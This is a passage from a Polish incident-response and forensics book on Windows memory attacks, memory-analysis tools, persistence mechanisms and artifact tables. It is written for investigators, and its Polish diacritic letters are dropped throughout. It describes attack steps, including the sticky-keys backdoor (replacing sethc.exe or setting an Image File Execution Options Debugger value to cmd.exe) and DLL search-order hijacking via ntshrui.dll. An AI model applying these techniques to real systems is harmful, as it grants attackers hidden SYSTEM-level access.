co bardzo ogranicza wachlarz technik jego analizy. Najczciej szuka si w nim acuchw oraz
rnych sw kluczowych. Niektre techniki poszukiwania, np. szukanie odwoa do pliku cmd.exe
lub innych pozostaoci po uywaniu wiersza polece, s dobre na pocztek, ale zazwyczaj najwicej
korzyci z pliku stronicowania odnosi si, gdy dysponuje si ju jakimi dobrymi tropami.
Uwaga Nie naley wyciga pochopnych wnioskw na podstawie samych dowodw anomalii wykrytych
w pliku stronicowania. W wynikach przeszukiwania tego pliku pod ktem wystpowania okrelonych
acuchw czsto mona znale pozostaoci sygnatur programw antywirusowych i hostowych
systemw zapobiegania wamaniom. Mog wrd nich znajdowa si podejrzane adresy IP,
nazwy domen oraz nazwy szkodliwych plikw, ktrych nigdy nie byo w badanym systemie.
System Windows domylnie nie kasuje zawartoci pliku stronicowania przy zamykaniu, ale
mona to zmieni. W tym celu naley ustawi warto rejestru KLM\SYSTEM\CurrentControlSet\
Control\Session Manager\Memory Management\ClearPageFileAtShutdown na 1.
Analizowanie typowych atakw na pami

Hakerzy stosuj wiele technik polegajcych na szperaniu w pamici procesw przestrzeni
uytkownika lub strukturach w pamici jdra. Robi to w celu ukrycia szkodliwych programw
i uniknicia wykrycia przez narzdzia ledcze. Poniej opisujemy dwie techniki tego typu, ktre
spotykamy najczciej w prowadzonych przez siebie ledztwach wstrzykiwanie procesw
i przechwytywanie zdarze (ang. hooking).
Wstrzykiwanie procesw
Technika wstrzykiwania procesw polega na tym, e szkodliwy proces wstrzykujcy zmusza
legalny proces do zaadowania i wykonania pewnego kodu. Gdy to si uda, proces wstrzykujcy
moe zakoczy dziaanie, poniewa jego zoliwy kod od tej pory bdzie wykonywany przez
zmodyfikowany legalny proces. Jako e jest to atak na pami, plik wykonywalny odpowiadajcy
procesowi, do ktrego wstrzyknito kod, na dysku pozostaje niezmieniony. Co wicej, szkodliwie
zmodyfikowany proces zazwyczaj nie zawiera adnych informacji pozwalajcych sprawdzi, ktry
proces wykona wstrzyknicie. Mona sobie wyobrazi, jak trudno rozpracowywa takie przypadki.
Do przeprowadzenia ataku wstrzykiwania kodu mona wykorzysta wiele rnych interfejsw
API i mechanizmw systemu Windows dysponujcych odpowiednimi uprawnieniami (najczciej
dziaajcych jako administrator lub system). Jest wiele rodzajw wstrzykiwania kodu, od zmuszania
procesu do zaadowania szkodliwego pliku DLL z dysku po bezporednie wpisanie szkodliwego
kodu do pamici procesu i wywoanie zdalnego wtku w celu jego wykonania. Istnieje te inna
technika polegajca na podmianie procesw. W metodzie tej szkodliwy program moe uruchomi
legalny plik wykonywalny w stanie zawieszenia, a nastpnie zapisa w pamici jego procesu szkodliwy
kod, ktry bdzie wykonywany po wznowieniu wykonywania tego zawieszonego procesu.
Na szczcie techniki analizy pamici pozwalaj wykry lady wstrzykiwania procesw.
Wiele najczciej stosowanych metod wstrzykiwania procesw pozostawia anomalie w przestrzeni
pamiciowej procesw, ktre mona wykry za pomoc specjalnych programw. Przykadowo
wtyczka dlllist do programu Volatility Framework znajduje pliki DLL adowane przez proces
podstawowymi technikami CreateRemoteThread i LoadLibrary, a wtyczka malfind wykrywa
lady bardziej zaawansowanych rodzajw wstrzykiwania. Take program Redline moe wykrywa
i oznacza sekcje pamici, w ktrych znajduj si lady zastosowania podstawowych technik
wstrzykiwania procesw. Na rysunku 12.35 przedstawiono przykad sekcji pamici oznaczonej
jako Injected (zaatakowanej technik wstrzykiwania) przez program Redline.
RYSUNEK 12.35. Dowody wstrzykiwania do sekcji pamici programw Explorer.exe i AcroRd32.exe wywietlone
w programie Redline
Jest jeszcze jeden sposb na wykrycie ladw wstrzykiwania procesw znalezienie programu
wstrzykujcego i ustalenie, jak on dziaa w systemie. Jeeli haker chce, aby wstrzyknity szkodliwy
kod przetrwa wylogowanie uytkownika lub ponowne uruchomienie systemu, jego program
wstrzykujcy musi zosta gdzie zapisany na stae. Oznacza to, e mona posuy si wszystkimi
technikami opisanymi wczeniej w tym rozdziale, takimi jak analiza kluczy automatycznego
uruchamiania, zmienianie kolejnoci wczytywania bibliotek DLL itd., aby zidentyfikowa zapisane
wirusy wykonujce wstrzykiwanie. Taki skadnik w czasie analizy moe by nieaktywny, ale jeli
uda si odkry jego mechanizm utrwalania i zdoby jego plik, fakt ten nie ma ju adnego znaczenia.
Przykadowo backdoor Poison Ivy moe stosowa technik wstrzykiwania procesw w celu
uruchamiania swojego kodu w niewidocznej instancji domylnej przegldarki internetowej

uytkownika. Ale modu wykonujcy to wstrzyknicie przy uruchamianiu systemu musi korzysta
z kluczy rejestru automatycznego wykonywania, zatem atwo go wykry.
Przechwytywanie zdarze
Oglnie rzecz biorc, przechwytywanie zdarze to technika umoliwiajca kodowi dziaajcych
procesw przechwytywanie, przegldanie i modyfikowanie zdarze, np. wywoa funkcji
i zwracanych przez nie danych. W systemie operacyjnym Windows znajduje si wiele
mechanizmw API, za pomoc ktrych procesy mog przechwytywa zdarzenia i odbiera
powiadomienia o ich wystpowaniu. Wykorzystuje je wiele legalnych aplikacji (wcznie
z antywirusami, systemami zapobiegania wamaniom i aplikacjami). Oczywicie twrcy wirusw
mog wykorzystywa te same mechanizmy lub stosowa mniej widoczne metody do wstawiania
szkodliwego kodu do strumienia wywoa funkcji przepywajcego midzy legalnymi aplikacjami.
Wirusy typu rootkit czsto wykorzystuj przechwytywanie zdarze do ukrywania plikw, procesw,
kluczy rejestru oraz pocze sieciowych przed uytkownikami i specjalistami od informatyki
ledczej. Na szczcie lady takich dziaa mona wykry za pomoc technik analizy pamici.
Uwaga Starowieckie rejestratory naciskanych klawiszy do przechwytywania danych z klawiatury

wykorzystyway jedn z dwch funkcji interfejsu API systemu Windows. Jedna z metod polegaa
na wykorzystaniu przechwytywania zdarze haker, wywoujc funkcj SetWindowsHookEx
z odpowiednimi parametrami, ustawia w szkodliwym pliku DLL funkcj, ktra miaa by
wywoywana dla kadego zdarzenia klawiaturowego. Inna metoda polegaa na wykorzystaniu
funkcji sondowania (ang. polling functions), np. GetAsyncKeyState do cigego sprawdzania,
czy ktry z klawiszy jest nacinity.
Wirusy mog implementowa procedury przechwytywania zdarze w przestrzeni uytkownika

dla wybranych procesw przez manipulacj tablic, w ktrych procesy rejestruj adresy funkcji
importowanych z innych plikw DLL przykadem tego jest przechwytywanie tablicy IAT (ang.
Import Address Table). W niektrych wersjach systemu Windows moliwe jest te przechwycenie
struktur danych jdra, np. tablic IDT (ang. Interrupt Descriptor Table) lub SSDT (ang. System
Service Dispatch Table), ktre s wykorzystywane do obsugi niskopoziomowych wywoa
systemowych. W 64-bitowych wersjach systemu Windows XP i Server 2003 z dodatkiem Service
Pack 1 dodano zabezpieczenie o nazwie KPP (ang. Kernel Patch Protection), zwane te PatchGuard.
Ma ono uniemoliwia tego typu ataki na jdro. Hakerzy znaleli jednak sposoby obejcia tego
mechanizmu, cho w praktyce w nowszych wersjach systemu Windows atwiej implementowa
procedury przechwytu w obszarze uytkownika.
Wiele narzdzi do analizy pamici rozpoznaje typowe cechy procedur przechwytujcych
dziaajcych w obszarze uytkownika i jdra. Przykadowo programy Memoryze i Redline maj
opcje analityczne identyfikujce niezaufane punkty zaczepienia w tablicach SSDT i IDT.
Volatility Framework ma wtyczk o nazwie apihooks wykrywajc punkty zaczepienia IAT,
rdliniowe i inne techniki stosowane zarwno w obszarze uytkownika, jak i jdra. Na rysunku 12.36
pokazano przykadowe wyniki zwrcone przez wtyczk apihooks w systemie zainfekowanym
wirusem Zeus. Wida w nich rdliniowy punkt zaczepienia (ang. inline) do funkcji
HttpSendRequestA zaimportowanej z biblioteki WinInet.dll w przestrzeni procesu lsass.exe.
RYSUNEK 12.36. Wyniki zwrcone przez wtyczk apihooks programu Volatility Framework w systemie
zainfekowanym wirusem Zeus
Narzdzia do analizy pamici

Poniej przedstawiamy zestawienie naszych ulubionych narzdzi do analizy pamici oraz
opisujemy ich moliwoci. O niektrych ju wspominalimy kilkakrotnie w tym rozdziale.
Zawsze dokadnie przetestuj kady program, ktrego zamierzasz uy do pobierania zawartoci
pamici w rodowisku produkcyjnym wykorzystywane przez te narzdzia metody czsto s
nieudokumentowane i opracowywane na podstawie inynierii wstecznej. Powane aktualizacje
systemw operacyjnych, a w niektrych przypadkach take instalacje dodatkw Service Pack,
mog spowodowa wadliwe dziaanie tych aplikacji w najlepszym przypadku zostanie tylko
wywietlony bd programu, a w najgorszym moesz spowodowa wywietlenie niebieskiego
ekranu na docelowym komputerze.
Narzdzia do wykonywania zrzutw pamici

Gdy chcemy wykona obraz pamici w systemie Windows, najczciej korzystamy z jednego
z nastpujcych darmowych programw.
FTK Imager firmy AccessData www.accessdata.com/support/product-downloads
DumpIt firmy MoonSols www.moonsols.com/resources/
Memoryze i Redline firmy Mandiant www.mandiant.com/resources/download/memoryze,
Narzdzia analityczne
Za pomoc wymienionych poniej darmowych narzdzi mona przeanalizowa i zrekonstruowa
zawarto obrazu pamici oraz zidentyfikowa wskaniki szkodliwej aktywnoci w przestrzeni
pamiciowej procesu lub jdra.
Memoryze i Redline firmy Mandiant www.mandiant.com/resources/download/memoryze,
Te darmowe programy firmy Mandiant su zarwno do robienia obrazw pamici,
jak i ich analizowania. Memoryze to aplikacja konsolowa przeznaczona dla bardziej
dowiadczonych uytkownikw. Redline wykorzystuje ten sam podstawowy mechanizm,
ale ma graficzny interfejs uytkownika, za pomoc ktrego uytkownicy mog wygenerowa
kolektor pamici, zaimportowa posiadany obraz pamici oraz przejrze jego zawarto
(jak rwnie zbada wiele innych dowodw z analizy na ywo, np. z systemu plikw,
rejestru i dziennikw zdarze). Oba te programy analizuj dziaajce procesy, uchwyty,
sekcje pamici, zaadowane sterowniki oraz poczenia sieciowe w obrazach pamici. Jeli s
uywane do wykonywania obrazu pamici, mog dodatkowo pobra informacje z systemu
plikw, takie jak podpisy cyfrowe i skrty plikw PE zaadowanych do pamici, aby uatwi
pniejsz identyfikacj szkodliwych plikw binarnych.
Volatility Framework firmy Volatile Systems
code.google.com/p/volatility/
Volatility to popularny otwarty system do analizy pamici na potrzeby ledztw, ktry jest
najbardziej znany z duego zbioru wtyczek utworzonych przez czonkw skupionej wok
niego spoecznoci. Pakiet ten jest napisany w jzyku Python, ale mona go dosta take
w formie plikw wykonywalnych. Jest to aplikacja konsolowa obsugujca du liczb
polece i argumentw, wic nauka jego obsugi moe zaj nieco wicej czasu ni narzdzi
z graficznym interfejsem uytkownika. Jednak warto powici troch czasu, poniewa
dostpne wtyczki zapewniaj bardzo szerokie spektrum moliwoci analitycznych
wykraczajcych daleko poza podstawowe funkcje analizy pamici mona robi wszystko,
od wydobywania gazi rejestru z pamici, przez wykrywanie rnych form przechwytywania
zdarze i wstrzykiwania procesw, po szukanie sygnatur Yara i sekwencji bajtw.
INNE MECHANIZMY UTRWALANIA

W podrozdziale Rejestr systemu Windows wprowadzilimy pojcie mechanizmu utrwalania
(zwanego te czsto regu automatycznego uruchamiania). Termin ten obejmuje szerok
kategori kluczy rejestru, cieek do plikw i innych skadnikw systemu Windows, ktre
automatycznie aduj i uruchamiaj kod wykonywalny zwykle podczas uruchamiania sytemu
lub logowania uytkownika. Hakerzy czsto wykorzystuj legalne (a take nieudokumentowane)
mechanizmy utrwalania w celu zapewnienia sobie uruchamiania backdoorw, rootkitw i innych
szkodliwych programw w zdobytym systemie.
Przytaczajca wikszo zoliwego oprogramowania zarwno specjalistycznego, jak i oglnego

wykorzystuje do utrwalania danych rejestr systemowy. Jak pisalimy wczeniej w tym rozdziale,
sama liczba kluczy rejestru umoliwiajcych zapisywanie informacji sprawia, e hakerowi bardzo
atwo ukry swoje poczynania, wykorzystujc na dodatek stabilne mechanizmy systemu operacyjnego
gwarantujce uruchamianie szkodliwego programu po zalogowaniu uytkownika lub ponownym
uruchomieniu systemu. Na szczcie wiele z tych kluczy jest dobrze znanych oraz istniej narzdzia
do ich znajdowania i sprawdzania.
Jednak rejestr to nie jedyne miejsce, w ktrym mona schowa reguy automatycznego
uruchamiania. (eby to byo takie proste!). W systemie Windows dostpnych jest kilka innych
niezalenych od rejestru mechanizmw, ktre mona wykorzysta w celu automatycznego
adowania i wykonywania szkodliwych aplikacji. W podrozdziale tym opisujemy techniki
posugiwania si niektrymi z nich, np. sposoby uycia folderw automatycznego uruchamiania
programw i cyklicznych zada zaplanowanych, metody modyfikacji plikw binarnych oraz
techniki zmieniania kolejnoci adowania bibliotek DLL.
Foldery startowe
Foldery startowe nale do najbardziej podstawowych mechanizmw utrwalania w systemie Windows.
Zasada ich dziaania jest bardzo prosta. Kady uytkownik ma w swoim profilu specjalny folder
startowy. Podczas logowania uytkownika system operacyjny uruchamiania wszystkie znajdujce si
w tym folderze programy. Ponadto istnieje jeszcze systemowy folder startowy, ktrego zawarto
jest uruchamiana podczas logowania kadego uytkownika.
W systemach 2000, XP i Server 2003 folder startowy dla wszystkich uytkownikw to
C:\Documents and Settings\All Users\Menu Start\Programy\Autostart, a foldery startowe
poszczeglnych uytkownikw to C:\Documents and Settings\[nazwauytkownika]\
Menu Start\Programy\Autostart.
W systemach Windows Vista i Windows 7 folderem startowym dla wszystkich uytkownikw
jest C:\ProgramData\Microsoft\Windows\Menu Start\Programy\Autostart, a dla poszczeglnych
uytkownikw przeznaczone s foldery C:\Users\[nazwauytkownika]\AppData\Roaming\
Microsoft\Windows\Menu Start\Programy\Autostart.
Naley wiedzie, e w folderze startowym mona zapisywa nie tylko pliki wykonywalne
widzielimy ataki oparte na umieszczeniu w tych folderach skryptw wsadowych, a nawet
plikw .lnk. Po co kto miaby uywa pliku .lnk? System Windows znajdzie wskazywany przez
niego plik i go uruchomi, gdziekolwiek si on znajduje. Kiedy wykrylimy szkodliw dziaalno
polegajc na wykorzystaniu pliku .lnk wskazujcego plik wscript.exe i adujcego osobny plik
JScript dostarczony w argumencie.
Zadania cykliczne
W podrozdziale Zadania zaplanowane opisalimy rne sposoby wykorzystania zada w celu
wykonania polece i aplikacji w zdalnych systemach. Ataki tego typu najczciej polegaj na
tworzeniu prostych zada do jednokrotnego wykonania w przyszoci za pomoc polecenia at.
Jednak za pomoc polecenia at, jak rwnie przy uyciu jego bardziej zaawansowanego odpowiednika
schtasks, mona take tworzy zadania wykonywane cyklicznie co okrelony czas, np. co pewn liczb
minut lub godzin albo w wybrane dni tygodnia. Hakerzy wykorzystuj te moliwoci do zapewnienia
sobie nieprzerwanego wykonywania swoich szkodliwych programw w zdobytych systemach.
Uwaga Przykadowo robak Conficker tworzy nienazwane zadania cykliczne (At#.job) podczas
rozprzestrzeniania si w zdalnych systemach. Zadania te uruchamiaj funkcj eksportu
ze szkodliwego pliku DLL poprzez dostarczenie go jako argumentu do pliku rundll32.exe.
Przysze i cykliczne zadania zaplanowane s przechowywane w postaci plikw .job w katalogu

%SYSTEMROOT%\Tasks. Szersze informacje o metodach analizy tych plikw, dziennikw
i innych rde dowodw zwizanych z usug harmonogramu zada znajduj si w podrozdziale
Zadania zaplanowane.
Modyfikacja systemowych plikw binarnych

Haker moe podmieni istniejcy plik binarny systemu Windows (najczciej wybierane s
te pliki, ktre system aduje automatycznie podczas uruchamiania lub logowania uytkownika)
na zmodyfikowan wersj wykonujc szkodliwy kod. Wykrycie takiego dziaania jest trudne
zwaszcza wtedy, gdy przebiegy haker zastosuje dodatkowo inne techniki zacierania ladw,
takie jak modyfikacja znacznikw czasu, poniewa w systemie znajduj si tysice plikw
wykonywalnych i bibliotek, ktre mog by potencjalnym celem ataku. Cho modyfikacja
legalnego pliku binarnego powoduje zmian jego skrtu MD5 (a jeli plik jest podpisany,
dochodzi take do uniewanienia podpisu), to rosnca liczba plikw systemu operacyjnego
i rnych aplikacji, jak rwnie ilo legalnych plikw binarnych pozbawionych podpisu cyfrowego
utrudniaj rozwizanie tego problemu za pomoc technik polegajcych na uyciu biaych list.
Oczywicie wszelkie zmiany powodujce awarie systemu Windows i pogarszajce komfort
korzystania z komputera utrudniayby hakerowi pozostanie niewykrytym w systemie. Dlatego
zmodyfikowane pliki binarne musz zachowywa oryginaln funkcjonalno lub przynajmniej nie
powodowa zauwaalnych zmian w sposobie dziaania systemu operacyjnego. W zwizku z tym
hakerzy czciej wybieraj do podmiany mniej wane pliki wykonywalne i biblioteki systemowe.
Modyfikacja rdzennego skadnika moe by bardzo skomplikowana i ryzykowna.
W starszych wersjach systemu Windows (XP i 2000) dziaa funkcja ochrony plikw systemowych
o nazwie WFP (ang. Windows File Protection), ktra wprawdzie zapobiega zmianom rdzennych plikw
systemu operacyjnego, ale jest przede wszystkim mechanizmem zapewniania stabilnoci systemu
w przypadkach popenienia bdu przez uytkownika lub program, a nie narzdziem do obrony
przed atakami hakerw. Usuga ta zawieraa kilka luk bezpieczestwa umoliwiajcych jej obejcie
uytkownikom posiadajcym uprawnienia administratora lokalnego. W systemie Windows Vista
firma Microsoft wymienia star implementacj funkcji WFP na znacznie skuteczniejsz funkcj
ochrony zasobw systemu Windows o nazwie WRP (ang. Windows Resource Protection). Sprawia ona,
e zasoby znajdujce si pod jej ochron moe modyfikowa tylko konto o specjalnych uprawnieniach
o nazwie TrustedInstaller i s dowody na to, e jest skuteczniejsza od poprzedniczki.
Atak na klawisze trwae

Atak na klawisze trwae to prosta, ale skuteczna odmiana modyfikacji systemowych plikw
binarnych, ktrej korzenie sigaj systemu Windows 2000. Celem tego ataku jest plik sethc.exe
zapewniajcy rne funkcje dostpnoci. Jedna z tych funkcji nazywa si Klawisze trwae rodzaj
opcji klawiaturowych, ktre mona aktywowa przez piciokrotne nacinicie klawisza Shift
podczas sesji interaktywnej.
Sztuczka jest bardzo prosta wystarczy zamieni plik sethc.exe na cmd.exe. Pniej w oknie
logowania (nawet podczas sesji RDP) haker naciska pi razy klawisz Shift i otrzymuje dostp do
wiersza polece jako uytkownik SYSTEM. Teraz uruchomienie pliku Explorer.exe i kadej innej
aplikacji jest ju banalnie atwe. Analityk ledczy moe atwo przeoczy, e kto majstrowa
przy pliku sethc.exe, poniewa nadal bdzie mia on podpis cyfrowy (oraz skrt MD5 obecny
na wikszoci list legalnego oprogramowania).
W systemach Windows Vista i nowszych technika ta ju nie dziaa, ale istnieje inna metoda,
ktr mona uzyska taki sam efekt. Wystarczy ustawi cmd.exe jako debugger dla sethc.exe przez
dodanie klucza rejestru HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\sethc.exe, utworzenie wartoci REG_SZ o nazwie Debugger i ustawienie jej
danych na C:\WINDOWS\system32\cmd.exe. Warto t mona take wykorzysta do ustawienia
dowolnego innego pliku wykonywalnego jako debuggera wybranego innego pliku wykonywalnego.
Modyfikowanie kolejnoci wczytywania bibliotek DLL

Modyfikowanie kolejnoci wczytywania bibliotek DLL (ang. load-order hijacking), zwane te
modyfikowaniem kolejnoci wyszukiwania (ang. search-order hijacking), to technika polegajca
na wykorzystaniu procesu wczytywania przez program potrzebnych mu plikw DLL. Haker moe
sprawi, e legalna aplikacja bdzie adowa i wykonywa szkodliwy kod z biblioteki DLL bez
posugiwania si technikami szperania w pamici, np. wstrzykiwania procesw.
Tylko nieliczne programy aduj pliki DLL ze statycznych zapisanych na stae miejsc powoduje
to problemy, gdy taki program zostanie zainstalowany w nietypowej lokalizacji. Wikszo programw
korzysta z mechanizmu systemowego umoliwiajcego dynamiczne adowanie z odpowiedniej
lokalizacji bibliotek wskazywanych za pomoc nazw. Firma Microsoft nazywa ten mechanizm
KnownDLLs. Jest on konfigurowany za pomoc wartoci rejestru HKLM\SYSTEM\CurrentControlSet\
Control\Session Manager\KnownDLLs, ktrej wartoci s pobierane z obiektu \\.\KnownDLLs w trakcie
uruchamiania sytemu. Pliki DLL wymienione w wartoci KnownDLLs s zawsze adowane z katalogu
%systemroot%\system32. Znajduj si wrd nich niektre biblioteki DLL najczciej uywane przez
aplikacje systemu Windows. W ten sposb zyskuje si pewno, e aplikacje zawsze bd wczytywa
waciwe wersje plikw DLL. Na rysunku 12.37 pokazano przykadowy klucz rejestru KnownDLLs.
Co w takim razie si dzieje, gdy aplikacja prbuje zaadowa plik DLL, ktrego nie ma w KnownDLLs?
Wwczas system Windows wcza specjalny algorytm wyszukiwania definiowany przez ustawienie
SafeDllSearchMode. W systemach starszych od Windows XP SP3 opcja ta bya domylnie wyczona.
W nowych wersjach systemu prawie zawsze jest wczona. W poniszej tabeli przedstawiono
zestawienie kolejnoci przeszukiwania rnych miejsc w zalenoci od wartoci tego ustawienia.
RYSUNEK 12.37. Przykadowa zawarto klucza rejestru KnownDLLs
Opcja SafeDllSearchMode wyczona Opcja SafeDllSearchMode wczona

Katalog, w ktrym adowana jest aplikacja Katalog, w ktrym adowana jest aplikacja
Biecy katalog roboczy %systemroot%\system32
%systemroot%\system32 %systemroot%\system
%systemroot%\system %systemroot%
%systemroot% Biecy katalog roboczy
Zmienna rodowiskowa %PATH% Zmienna rodowiskowa %PATH%
Firma Microsoft prowadzi stron internetow powicon algorytmowi wyszukiwania plikw

DLL we wszystkich wersjach systemu Windows pod adresem msdn.microsoft.com/en-us/library/
ms682586(VS.85).aspx.
Aby przeprowadzi atak polegajcy na zmodyfikowaniu kolejnoci wyszukiwania bibliotek
DLL, haker musi wykorzysta nazw aplikacji i docelowego pliku DLL, przy czym:
nazwa legalnego pliku DLL nie moe by podana w wartoci rejestru KnownDLLs;
legalny plik DLL nie moe znajdowa si w tym samym katalogu, co plik wykonywalny
aplikacji;
plik wykonywalny nie moe adowa plikw DLL ze cieki okrelonej na stae.
Szeroko znanym przykadem, opisanym na blogu firmy Mandiant, jest wykorzystanie plikw
ntshrui.dll i explorer.exe. Plik wykonywalny Eksploratora Windows znajduje si w katalogu %systemroot%,
natomiast legalna kopia pliku ntshrui.dll jest zlokalizowana w katalogu %systemroot%\system32.
Eksplorator automatycznie aduje plik ntshrui.dll przy uruchamianiu systemu, ale plik ten nie jest
chroniony za pomoc wpisu na licie KnownDLLs. W efekcie haker moe umieci w folderze
%systemroot% wasn kopi tego pliku i to ona zostanie zaadowana przez Eksplorator Windows,
poniewa bdzie znajdowa si w tym samym katalogu, co jego plik wykonywalny. W ten sposb
mona podrzuci do systemu zoliwy kod w kopii pliku ntshrui.dll bez modyfikowania
czegokolwiek w rejestrze, wstrzykiwania procesw itd.
Uwaga Technika ta nie ogranicza si tylko do pliku explorer.exe, cho jest on popularnym celem z powodu
duej liczby adowanych plikw DLL nieznajdujcych si pod ochron listy KnownDLLs i jego lokalizacji
poza katalogiem %systemroot%\system32. Spotykalimy take ataki tego typu skierowane na inne
pliki wykonywalne, take wykorzystywane przez aplikacje zewntrzne nienalece do samego
systemu Windows.
Jest to bardzo sprytna sztuczka pozwalajca zmusi legalny program do wczytania szkodliwego
kodu, cho haker musi uwaa, aby swoimi dziaaniami nie doprowadzi do niestabilnoci systemu
ani nie uszkodzi jakich funkcji. Dlatego te szkodliwe pliki DLL wykorzystywane w atakach
polegajcych na modyfikowaniu kolejnoci wczytywania bibliotek DLL z reguy zawieraj taki sam
zestaw funkcji eksportowanych jak ich legalne odpowiedniki. W razie wywoania wirus moe po
prostu przekaza te eksportowane funkcje do oryginalnego pliku DLL. W ten sposb aplikacja
wywoujca moe nadal dziaa prawidowo, a haker nie musi odtwarza funkcjonalnoci w swoim
pliku DLL.
Wykrycie ladw modyfikacji adowania plikw DLL w systemie moe by bardzo trudne.
Czsto wykorzystujemy w tym celu kombinacj metod analizy czasowej systemu plikw
(koncentrujc si na plikach DLL tworzonych w okresie aktywnoci hakera) i technik analizy
pamici (skupiajc si na niepodpisanych plikach DLL adowanych przez legalne aplikacje).
W ten sposb udaje nam si wykry szkodliwe programy wykorzystujce ten mechanizm
utrwalania. Ponadto analityk moe utworzy wskaniki zagroenia dotyczce wybranych plikw
DLL, ktre nigdy nie powinny by adowane z okrelonych miejsc (jak opisany w przykadzie
plik ntshrui.dll).
POWTRZENIE ODPOWIEDZI
NA CZSTO POJAWIAJCE SI PYTANIA
Ostrzegalimy na pocztku tego rozdziau, e system Windows to skomplikowany program.
Opisalimy wiele rnych rde materiau dowodowego, ale moe by trudno poapa si, ktre
rda zawieraj okrelone informacje. Dlatego w ramach powtrzenia wiadomoci w podrozdziale
tym przedstawiamy zwize zestawienie czsto spotykanych pyta i scenariuszy oraz list typw
dowodw, ktre mog pomc w rozwizywaniu tych problemw. Oczywicie nie jest to wyczerpujca
lista wszystkich moliwych rde danych, ale od sprawdzenia wymienionych miejsc najczciej
zaczynamy prac w systemach Windows.
Jakie rda ladw mona wykorzysta do analizy czasowej?
Artefakt rda informacji czasowych

Tabela MFT systemu plikw NTFS Znaczniki czasu MACE atrybutw Standard
Information i Filename Information
Atrybuty INDX systemu plikw NTFS Znaczniki czasu MACE (tylko Standard Information)
Pliki pobierania z wyprzedzeniem Czas pierwszego i ostatniego uruchomienia
Dzienniki zdarze Czas wygenerowania wpisu, czas zarejestrowania wpisu
Pliki LNK Znaczniki czasu MACE (Standard Information)
wskazywanego pliku
Pliki INFO2 i I$ Kosza Data i godzina usunicia
Zadania zaplanowane (pliki .job) Czas ostatniej modyfikacji klucza
Rejestr wszystkie klucze Czas ostatniej modyfikacji klucza
Rejestr ShimCache Data i godzina ostatniej modyfikacji (Standard
Information) kadego rejestrowanego pliku; czas
ostatniej aktualizacji (tylko w niektrych wersjach
systemu Windows)
Rejestr UserAssist Czas ostatniego wykonania aplikacji
Rejestr ShellBags MAC (Standard Information) kadej ledzonej cieki
Pami procesy Czas utworzenia i zamknicia
Pami poczenia sieciowe Czas utworzenia
Gdzie szuka dowodw na to, e dany plik by wykonywany?
Artefakt Dostpne dowody

Pliki pobierania z wyprzedzeniem Pena cieka do pliku wykonywalnego,
liczba uruchomie, czas pierwszego i ostatniego
uruchomienia, pliki uywane podczas pierwszych
10 sekund dziaania
Rejestr ShimCache Dla kadego ledzonego pliku wykonywalnego
i skryptu: pena cieka do pliku, rozmiar (opcjonalny),
znacznik wykonywania (opcjonalny), data ostatniej
modyfikacji, data ostatniej aktualizacji rekordu
(opcjonalna)
Dzienniki zdarze We wpisach o zdarzeniach inspekcji procesw
dziennik bezpieczestwa (EID 4688, 4689) rejestrowane s pena cieka
do wykonywanego pliku, identyfikator procesu,
identyfikator procesu nadrzdnego, nazwa
uytkownika, identyfikator logowania oraz data
i godzina uruchomienia i zatrzymania procesu
Dzienniki zdarze dziennik We wpisach o zdarzeniach uruchomienia zadania
operacyjny harmonogramu zada (EID 129, 201) rejestrowane s cieki do plikw
wykonywanych przez zadania zaplanowane.
We wpisach o zdarzeniach rejestracji i aktualizacji
zada (EID 106, 140) rejestrowane s nazwa zadania
i nazwa uytkownika, ktry utworzy te zadania.
Dziennik zada zaplanowanych Nazwa pliku wykonywanego przez zadanie, data
(SchedLgU.txt) i godzina wykonania oraz kod statusu zakoczenia
operacji
Dzienniki zdarze systemowy Zdarzenia utworzenia, uruchomienia i zatrzymania
znanych usug zwizanych ze szkodliwymi plikami
Rejestr gazie uytkownika Klucze MUICache i UserAssist rejestruj aplikacje
uruchamiane podczas sesji interaktywnych
Rejestr klucze MRU Klucze MRU mog wykaza, e uytkownik uywa
okrelonych aplikacji w celu otwarcia plikw, adresw
lub innych zasobw
Jakie artefakty pozwalaj wykry lady usunitych plikw?

Tabela MFT systemu plikw NTFS Rekordy nieaktywne wszystkie atrybuty MFT
pozostan dostpne (wcznie z ewentualnymi danymi
rezydentnymi)
Atrybuty INDX systemu plikw NTFS Pozostaoci usunitych plikw w pustej przestrzeni
INDX. Mona z nich wydoby oryginalny rozmiar pliku
i znaczniki czasu MAC (Standard Information)
Pliki LNK Pliki te mog pozosta na dysku nawet po usuniciu
pliku, ktry wskazyway
Kosz Pliki INFO2 (Windows XP) i $I (Windows Vista i nowsze)
zawieraj metadane dotyczce zawartoci Kosza
Artefakty wykonywanych plikw Zajrzyj do sekcji Gdzie szuka dowodw na to, e dany
i skryptw plik by wykonywany?. Artefakty te pozostaj w systemie
nawet po usuniciu pliku. Przykadowo lista uywanych
plikw w pliku pobierania z wyprzedzeniem usunitego
pliku wykonywalnego moe zawiera informacje
o dodatkowych usunitych plikach
Rejestr klucze MRU Klucze MRU mog zawiera informacje o plikach,
ktrych nie ma ju w systemie, a ktre byy otwierane
przez Eksplorator Windows lub inne aplikacje
Ktre pliki s automatycznie uruchamiane podczas uruchamiania systemu

lub logowania uytkownika?

Rejestr klucze automatycznego Run, RunOnce, Services, Active Setup\Installed Components,
uruchamiania Winlogon, klucze pakietw LSA, Userinit, AppInit_DLLs,
Browser Helper Objects, Shell Extensions itd.
Zadania zaplanowane Pliki .job zaplanowane do wykonania w przyszoci
lub przeznaczone do cyklicznego wykonywania
System plikw foldery startowe Zawarto folderu startowego uytkownika jest
uytkownika automatycznie wykonywana podczas logowania
System plikw pliki DLL (Zoliwe?) pliki DLL umieszczone w niewaciwym
miejscu w celu zmylenia funkcji wyszukiwania
bibliotek DLL
Kto interaktywnie logowa si w systemie?

Ktrego dnia i o ktrej godzinie dany uytkownik logowa si w systemie?

Dzienniki zdarze Udane i nieudane prby logowania (wg typu): logowanie typu 2.
dziennik zabezpiecze (konsola, np. VNC, udostpnianie ekranu, dostp fizyczny),
logowanie typu 7. (odblokowanie ekranu), logowanie typu 10.
(usugi terminalowe, RDP). Dane rejestrowane w systemie,
do ktrego uzyskiwano dostp dla kont lokalnych i do ktrego
uzyskiwano dostp + dane w kontrolerze domeny dla kont
domenowych. Wpis zdarzenia moe zawiera adres IP systemu
rdowego. System rdowy, z ktrego zainicjowano zdarzenie
logowania przez sie, moe mie te zarejestrowane zdarzenie
logowania, jeli uytkownik sprbuje uwierzytelni si w zdalnym
systemie w kontekcie innego konta
Dzienniki zdarze Meneder pocze zdalnych usug terminalowych (EID 1149)
dzienniki usug uytkownik, domena, rdowy adres IP.
